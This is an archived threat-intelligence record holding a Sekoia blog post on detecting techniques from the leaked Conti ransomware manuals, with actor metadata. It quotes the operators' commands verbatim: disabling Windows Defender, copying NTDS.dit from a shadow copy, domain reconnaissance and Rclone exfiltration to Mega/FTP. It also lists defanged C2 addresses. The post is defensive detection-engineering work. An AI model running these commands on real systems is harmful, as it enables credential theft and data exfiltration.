{ "id": "96c0381b-d164-4e33-979d-68dcdb956a47", "created_at": "2026-04-06T00:10:21.588214Z", "updated_at": "2026-04-10T13:12:56.647427Z", "deleted_at": null, "sha1_hash": "4daadacc53becf5b64b437e1482154a8f751efac", "title": "An insider insights into Conti operations – Part Two", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1628233, "plain_text": "An insider insights into Conti operations – Part Two\r\nBy Quentin Bourgue,\u0026nbsp;Erwan Chevalier,\u0026nbsp;Guillaume C.\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2021-08-19 · Archived: 2026-04-05 15:38:10 UTC\r\nTable of contents\r\nLet’s detect Conti’s techniques!\r\nDisable Windows Defender using PowerShell (T1562.001)\r\nRetrieve NTDS file from Volume Shadow Copy (T1003.003)\r\nIdentify domains using Nltest (T1482)\r\nIdentify remote systems using net command (T1018)\r\nExfiltrate data using Rclone (T1567.002)\r\nCobalt Strike (T*)\r\nConclusion\r\nThe first blog post was focusing on Conti’s evolution and the leak’s context and analysis. In this second blog post,\r\nwe will look into how to make simple detection rules to detect the techniques shown in the Conti manuals. The\r\ntechniques are simple for most of them, with no obfuscation and classic techniques being used, hence why simple\r\ndetection rules are possible.\r\nFor that, we picked a few techniques that we will explain, and link them to existing rules to show that open-source\r\ndetection techniques already exist for such a threat and can be used to help all the companies prevent that.\r\nHowever, please note that even though simple rules can detect Conti operations as displayed in the manuals, it\r\ndoes not mean it will detect future Conti intrusions or other ransomware actors. The techniques are important and\r\nshould be explored in depth to make better detection rules.\r\nLet’s detect Conti’s techniques!\r\nDisable Windows Defender using PowerShell (T1562.001)\r\nThe command used to Disable Windows Defender by the Conti operators is the following one:\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\nThey use PowerShell and the command “Set-MpPreference” that is used to configure preferences for Windows\r\nDefender scans and updates on the whole system, instead of “Add-MpPreference” that modifies the settings of\r\nWindows Defender and is often used to whitelist a specific path from being scanned by Windows Defender.\r\nA thing to note here is that the Conti operators seem to disable ONLY “RealTimeMonitoring”, whereas most of\r\nthe actors also disable “BehaviorMonitoring”.\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 1 of 11\n\nAlthough there are lots of ways to disable Windows Defender, this is a widely used technique and therefore a good\r\ndetection opportunity. Indeed, this is used by many other ransomware actors, but also APT actors such as Lazarus,\r\nas shown in the F-Secure blogpost¹(URL accessed August 19, 2021). \r\nA Sigma rule to detect this is provided as well with the blogpost and its GitHub repository². \r\nThis is great as it allows such a threat to be detected with only Event ID 1 from SYSMON or Event ID 4688 from\r\nWindows for example.\r\nIn Sekoia.io we have a similar rule to detect this technique, however as written in the introduction to this blog\r\npost, the command itself is not really important, what’s important is the technique: Disabling Windows Defender.\r\nTherefore we looked into the TTP in depth to check what techniques can be used to disable Windows Defender\r\nand built rules on that. \r\nTo give a few examples, Windows Defender can be disabled using the command “sc” or through registry keys\r\ndirectly as well. Its legitimate executable “MpCmdRun.exe” can also be used to remove all signatures within\r\nWindows Defender, making it not really disabled but quite useless for detection.\r\nHere is how Windows Defender being disabled using PowerShell is shown on a Sekoia.io alert:\r\nDetection of Windows Defender deactivation in Sekoia.io\r\nRetrieve NTDS file from Volume Shadow Copy (T1003.003)\r\nDumping the “NTDS.dit” file from the Active Directory is a very common method to extract password hashes of\r\nall the domain members. To achieve this, various tools or techniques can be used. The one performed by Conti\r\noperators is based on the copy of the “NTDS.dit” file from a Volume Shadow Copy.\r\nConti operators are not the only ones to use that technique. MITRE ATT\u0026CK is listing some software and groups\r\nusing this technique, named “OS Credential Dumping: NTDS”³. These threat actors include FIN6, Fox Kitten, and\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 2 of 11\n\nMustang Panda.\r\nThe widely used technique detailed in the Conti manual consists in finding a Shadow Copy on the Active\r\nDirectory and then copying the “NTDS.dit” file. In case no Shadow Copy exists, the Conti operators create one\r\nusing the “vssadmin” command. The command lines used by the operators are the following ones:\r\nwmic /node:”DC01″ /user:”DOMAIN\\admin” /password:”cleartextpass” process call create “cmd /c vssadmin list shadows \u003e\u003e c:\\log.txt”\r\nOR\r\nwmic /node:”DC01″ /user:”DOMAIN\\admin” /password:”cleartextpass” process call create “cmd /c vssadmin create shadow /for=C:\r\n2\u003e\u00261”\r\nTHEN\r\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\programdata\r\nThe detection of the NTDS.dit file dump using Volume Shadow Copy can be achieved at different steps.\r\nFirst, monitoring suspicious “vssadmin” execution may reveal the creation, the deletion or the listing of Shadow\r\ncopies. While creating Shadow copies is a common solution used to perform regular backups, listing and deleting\r\nShadow copies are much rarer.\r\nDetection rule can be done on the Microsoft-Windows-Security-Auditing Event ID 4688 (A new process has been\r\ncreated) by looking for the process name “vssadmin.exe” and suspicious command line arguments, which could\r\nbe “delete shadows”, “list shadows”, “create shadow /for=C:”. The Event ID 1 (Process creation) from Sysmon\r\ncan also be used with the fields “Image” and “CommandLine”.\r\nSecond, detecting activities related to the “NTDS.dit” file would be efficient to identify attacker behaviors. To do\r\nthis, a solution is monitoring command lines that contain the command “copy” and the “NTDS.dit” file path\r\n“\\Windows\\NTDS\\NTDS.dit”. Again, the Windows Event Event ID 4688 and Sysmon Event ID 1 allow this.\r\nSysmon can also be used to detect the creation of this file using the Event ID 11 (FileCreate) and checking if the\r\n“TargetFilename” matches “*NTDS.dit” in case the attacker doesn’t rename it.\r\nA Sigma rule⁴ provides elements to detect the technique used by Conti operators.\r\nOther ways to dump “NTDS.dit” file are possible, using the built-in Windows tools (esentutl, ntdsutil) or\r\npenetration testing tools (Mimikatz, Koadic, CrackMapExec, …). Again, their execution can be detected using\r\nWindows and Sysmon events.\r\nWe replayed the commands on a Windows machine supervised by the Sekoia.io XDR. Here are two alerts that\r\nhave been raised:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 3 of 11\n\nDetection of Shadow Copies listing on Sekoia.io\r\nDetection of the copy of NTDS.dit file on Sekoia.io\r\nIdentify domains using Nltest (T1482)\r\nConti operators used the Windows built-in command “nltest.exe” to identify Domain Controllers (DCs) and\r\n“trusts” relationships. As their name says, Domain Controllers are servers that can “control” a Windows Domain\r\nand therefore this command is commonly used by attackers as it is a quick, built-in way to enumerate servers of\r\ngreat interest.\r\nThe trust relationship is a link between domains or forests in a Windows environment. When this link is set up\r\nbetween two domains for instance, domain A can access resources in domain B. It is way more complex than that\r\nthough as there can be one-way trust or two-ways trust, … We recommend reading the Microsoft\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 4 of 11\n\ndocumentation⁵ for more details and this great blogpost⁶ by @harmjoy which covers many techniques used to\r\nabuse domain trusts.\r\nAlthough being built-in, the “nltest” command is surprisingly not used much for legitimate usage by\r\nusers/administrators, which makes it a great detection opportunity! Here are the exact commands used by the\r\nConti operators:\r\nnltest /DOMAIN_TRUSTS\r\nnltest /dclist:”NameDomain”\r\nnltest /domain_trusts /all_trusts\r\nThese three commands do the following:\r\nReturns a list of trusted domains.\r\nReturns all Domain Controllers on a specific domain (NameDomain here)\r\nReturns all trusted domains.\r\nAgain, as these commands are commonly used and really simple, a public Sigma rule⁷ already exists for this and\r\ncan be used to detect all three commands. \r\nThis rule can be used with only the Windows Event ID 4688 or Sysmon Event ID 1.\r\nOther techniques can be used to retrieve similar information such as “dsquery.exe”, as it can be observed in the\r\nSigma rule, which is also a legitimate built-in Windows executable. One other quick win is to take a look at\r\nPowerShell commands that can be used as well to retrieve a list of Domain Controllers for a domain, although that\r\nis more commonly used and can lead to some false positives.\r\nHere is how an alert regarding that technique is shown on Sekoia.io:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 5 of 11\n\nDetection of domain trusts discovery using the “nltest” command\r\nMars, a red-hot information stealer\r\nIdentify remote systems using net command (T1018)\r\nConti operators executed the following commands (Sekoia.io removed explicit information on hostnames and\r\nusernames):\r\nnet view \\\\[DC_SERVER] /all   1\u003e\u003ec:\\programdata\\sh.txt\r\nnet view \\\\[HOSTNAME] /ALL\r\nnet view /all /domain\r\nnet view \\\\host /ALL\r\nnet view \\\\172.16.1.40 /ALL\r\nnet user [USERNAME] /dom\r\nnet user [USERNAME] /domain\r\nnet user Администратор /active:yes\r\nnet group “domain admins” /domain\r\nnet accounts /dom\r\nThere are several things to note in these commands. \r\nThe first one is that once, they use the operator “1\u003e\u003e” to redirect command output into a file. Redirecting output\r\nto a file on Windows is already not necessarily common but still can lead to quite a lot of false positives\r\ndepending on the Estates, however it is mainly done by using only “\u003e” or “\u003e\u003e”, not “1\u003e\u003e”. \r\nThere is an awesome quick win here: checking for “1\u003e\u003e” in the command line argument.\r\nThe second thing is that even though most of the listed commands are very commonly used in a corporate\r\nenvironment, the following one can have a higher detection rate:\r\nnet group “domain admins” /domain\r\nIndeed, this is a bit less common to see that command in corporate environments and therefore this can be used for\r\ndetection. This is also a rule available publicly on the Sigma repository⁸ and can be detected with the Windows\r\nEvent ID 4688 or Sysmon Event ID 1 as well. Depending on your Estate’s activity, you might be able to remove\r\nthe time and count conditions in the rule to be more specific and be able to catch an attacker using this command a\r\nsingle time. Although note that this might lead to some false positives and this should definitely be adapted to\r\nyour corporate environment.\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 6 of 11\n\nExcept that, all the commands are very commonly used in a corporate environment. They are discovery /\r\nreconnaissance commands and should still be detected in our opinion, however with a low “score” / “urgency”. As\r\nshown above with the Sigma rule though, it can be a good thing to have a higher score if the commands are\r\nexecuted on the same host multiple times in a row in a few seconds. Note that seeing only one of these commands\r\nshould not be a “red flag”, however it is still useful to have a rule for it in case other rules match. \r\nLet’s take a quick example with only the commands above. There are 10 commands listed. Assuming the 10 are\r\nexecuted (even if that will probably not be the case), the created rules will match 10 times. \r\nAt SEKOIA.IO we use an urgency “score” that represents the criticality of an alert and if it should be dealt with\r\nright away or not. We also have a “similarity” system, which will give us how many times a rule has matched on\r\nthe same host.\r\nTherefore, if several commands are executed on the same host, and each command matches the same rule, we will\r\nstill have a low urgency score however we will have a high “similarity” number.\r\nIn case only one command is executed, we will have one alert with one event and 0 similarity, hence we will know\r\nthat it is most likely a false positive if no other rule matches as well. \r\nHowever when the 10 commands are executed, we will have either: \r\none alert with 10 similarities if the commands are executed on the same host\r\n10 alerts otherwise\r\nEither way, this is already a bit suspicious. Following that, we will analyse the events and check if there are other\r\nsuspicious events on the same host / surrounding those commands overall. And this is only the discovery step, so\r\nmany other alerts, as shown in this blogpost for example, will (likely) be raised!\r\nEverything above is just here to say one thing: every step of the MITRE ATT\u0026CK matrix is worth being detected.\r\nFalse positives can always be avoided / reduced and not detecting those techniques (and especially the discovery\r\ntechniques) could lead to a huge delay from the defenders to spot the attacker.\r\nThe detection of every command here is quite straightforward as well with just the detection of\r\n“net.exe”/”net1.exe” and each option for example and works with Windows Event ID 4688 and Sysmon Event ID\r\n1 as well.\r\nHere is a simple example that shows an alert on SEKOIA.IO when “net.exe” or “net1.exe” are used to discover\r\nshares:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 7 of 11\n\nDetection of network share discovery commands on Sekoia.io\r\nExfiltrate data using Rclone (T1567.002)\r\nRclone is a legitimate program to manage files on Cloud storage that is often used by ransomware operators\r\nperforming double extortion. Indeed, it is a simple command-line tool that enables them to exfiltrate data from\r\ncompromised systems to their storage system. In 2021, Rclone was observed in several ransomware attacks\r\noperated by Darkside, Egregor, Revil or Conti operators. This tool is rarely used in company IT environments. It is\r\ntherefore relevant to look for its possible execution traces.\r\nAccording to the leaked manual and a previous DFIR report⁹, Conti operators are using Rclone with a\r\nconfiguration file and without trying to disguise their activities. Indeed, they download the program directly from\r\nthe official webpage and don’t obfuscate their commands:\r\nrclone.exe config\r\nrclone.exe config show\r\nrclone.exe copy “FILES” Mega:Finanse -q –ignore-existing –auto-confirm –multi-thread-streams 12 –transfers 12\r\nrclone.exe copy “FILES” ftp1:uploads/Users/ -q –ignore-existing\r\n–auto-confirm –multi-thread-streams 3 –transfers 3\r\nThe Conti operators seem to use FTP servers and Mega service to exfiltrate victims’ data. This information is\r\ninteresting to detect their activities in case Rclone is legitimately used in an IT environment, but with other Cloud\r\nstorage than FTP and Mega. \r\nHere are some ways to detect the Rclone usage on Windows systems:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 8 of 11\n\nA basic way is to monitor process creation whose process name is “rclone.exe” by using Windows Event\r\nID 4688 or Sysmon Event ID 1. This method is sufficient to detect operations performed by Conti\r\noperators.\r\nIn case attackers masquerade the executable by renaming it, it remains possible to detect its execution\r\nusing the same Windows or Sysmon events by searching in the “CommandLine” value for specific\r\narguments sequences. For example, detecting the patterns “copy”, “mega:” and “–” (which corresponds to\r\nan additional flag) in the same command line is specific enough to find execution of a renamed Rclone\r\nbinary. Of course, the pattern “mega:” can be replaced by “ftp:”, “pcloud:”, “s3” or any other storage\r\nservices likely to receive data exfiltrated by an attacker.\r\nIn case attackers masquerade the executable and use a Rclone configuration file instead of indicating the\r\ndestination endpoint in the command line, it is possible to detect the arguments specific to Rclone usage.\r\nFor example, looking for “–ignore-existing”, “–auto-confirm”, “–multi-thread-streams”, “–transfers”, “no-check-certificate” in addition to the argument “copy” may reveal Rclone execution.\r\nAgain, Sigma detection rules¹⁰ ¹¹ ¹² detecting Rclone execution are available in their GitHub repository.\r\nA detection rule based on the three previously described cases has raised an alert in Sekoia.io XDR when playing\r\nthe Conti operators’ commands to exfiltrate data using Rclone. \r\nDetection of Rclone commands on Sekoia.io\r\nCobalt Strike (T*)\r\nCobalt Strike usage is a golden mine to detect a compromised network and was already covered in that previous\r\nblog post¹³. \r\nOn top of that, Cobalt Strike C2 (Command and Control servers) can often be spotted, depending on the\r\nconfiguration, using different sources (online and offline). In the leaks, 4 CobaltStrike IP addresses were provided:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 9 of 11\n\n“162.244.80[.]235”, “85.93.88[.]165”, “185.141.63[.]120” and “82.118.21[.]1”.\r\nAlthough after the leak they probably won’t be used as this is really easy to block for companies and now\r\nintegrated into many feeds, what is useful is to spot the C2s BEFORE they are used in operations and overall\r\nbefore they are made publicly available.\r\nAt SEKOIA we are tracking adversary infrastructures to collect information on C2s using different sources. As an\r\nexample, we had the Cobalt Strike C2s provided in the leak before they leaked (and therefore hopefully before\r\nthey were used in any operation):\r\nWhere “MalleableC2” stands for specific profiles used by the Cobalt Strike team server and “Cobalt Strike” the\r\ndefault Cobalt Strike configuration. As displayed in the image, one C2 was spotted on July 12th, 2021 which is\r\nalmost a month before the first leak. It is therefore quite useful to have this kind of capability on top of system and\r\nnetwork classic detections as it gives another way to detect threats and usually companies can easily perform\r\nactions on IP addresses (\u0026 domain names).\r\nConclusion\r\nThis second blog post focused on the detection of the leaked Conti’s techniques. As stated several times, it shows\r\nthat detecting ransomware operators’ actions before its execution is actually possible as there are multiple\r\ndetection opportunities. Indeed, they use commands that are commonly seen among many attackers and they seem\r\nto not obfuscate the commands. In the end, it is still a good opportunity to fill any detection gaps if you have some\r\nand review the MITRE ATT\u0026CK overall to study the techniques used by Conti more in depth to detect other\r\nactors that might use more complex techniques.\r\nOur analysis leaves us with one question: will Conti operators change their modus operandi following the\r\nleaks or not? \r\nSince the techniques used are already not really advanced but efficient, at SEKOIA we think that the leaks will not\r\nhave much impact on the way Conti operates. As they aim for efficiency and money, they will still target\r\ncompanies carefully and then launch their ransomware as fast as they can. They probably won’t bother in\r\nchanging the techniques since that costs money, most of the techniques were already known before the leaks in the\r\ndifferent incident response reports and it still works today so, why bother?\r\nExternal references:\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 10 of 11\n\n[1] https://labs.withsecure.com/publications/catching-lazarus-threat-intelligence-to-real-detection-logic (URL\r\naccessed August 19, 2021).\r\nThank you for reading this article. You can also read our article on:\r\nChat with our team!\r\nWould you like to know more about our solutions?\r\nDo you want to discover our XDR and CTI products?\r\nDo you have a cybersecurity project in your organization?\r\nMake an appointment and meet us!\r\nCTI Detection Ransomware\r\nShare this post:\r\nSource: https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nhttps://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/" ], "report_names": [ "an-insider-insights-into-conti-operations-part-two" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2c348851-5036-406b-b2d1-1ca47cfc7523", "created_at": "2022-10-25T16:07:24.039861Z", "updated_at": "2026-04-10T02:00:04.847961Z", "deleted_at": null, "main_name": "Parisite", "aliases": [ "Cobalt Foxglove", "Fox Kitten", "G0117", "Lemon Sandstorm", "Parisite", "Pioneer Kitten", "Rubidium", "UNC757" ], "source_name": "ETDA:Parisite", "tools": [ "Cobalt", "FRP", "Fast Reverse Proxy", "Invoke the Hash", "JuicyPotato", "Ngrok", "POWSSHNET", "Pay2Key", "Plink", "Port.exe", "PuTTY Link", "SSHMinion", "STSRCheck", "Serveo" ], "source_id": "ETDA", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "6e3ba400-aee3-4ef3-8fbc-ec07fdbee46c", "created_at": "2025-08-07T02:03:24.731268Z", "updated_at": "2026-04-10T02:00:03.651425Z", "deleted_at": null, "main_name": "COBALT FOXGLOVE", "aliases": [ "Fox Kitten ", "Lemon Sandstorm ", "Parisite ", "Pioneer Kitten ", "RUBIDIUM ", "UNC757 " ], "source_name": "Secureworks:COBALT FOXGLOVE", "tools": [ "Chisel", "FRP (Fast Reverse Proxy)", "Mimikatz", "Ngrok", "POWSSHNET", "STSRCheck", "Servo", "n3tw0rm ransomware", "pay2key ransomware" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "871acc40-6cbf-4c81-8b40-7f783616afbc", "created_at": "2023-01-06T13:46:39.156237Z", "updated_at": "2026-04-10T02:00:03.232876Z", "deleted_at": null, "main_name": "Fox Kitten", "aliases": [ "UNC757", "Lemon Sandstorm", "RUBIDIUM", "PIONEER KITTEN", "PARISITE" ], "source_name": "MISPGALAXY:Fox Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d070e12b-e1ce-4d8d-b5e3-bc71960cc0cb", "created_at": "2022-10-25T15:50:23.676504Z", "updated_at": "2026-04-10T02:00:05.260839Z", "deleted_at": null, "main_name": "Fox Kitten", "aliases": [ "Fox Kitten", "UNC757", "Parisite", "Pioneer Kitten", "RUBIDIUM", "Lemon Sandstorm" ], "source_name": "MITRE:Fox Kitten", "tools": [ "China Chopper", "Pay2Key", "ngrok", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434221, "ts_updated_at": 1775826776, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.pdf", "text": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.txt", "img": "https://archive.orkl.eu/4daadacc53becf5b64b437e1482154a8f751efac.jpg" } }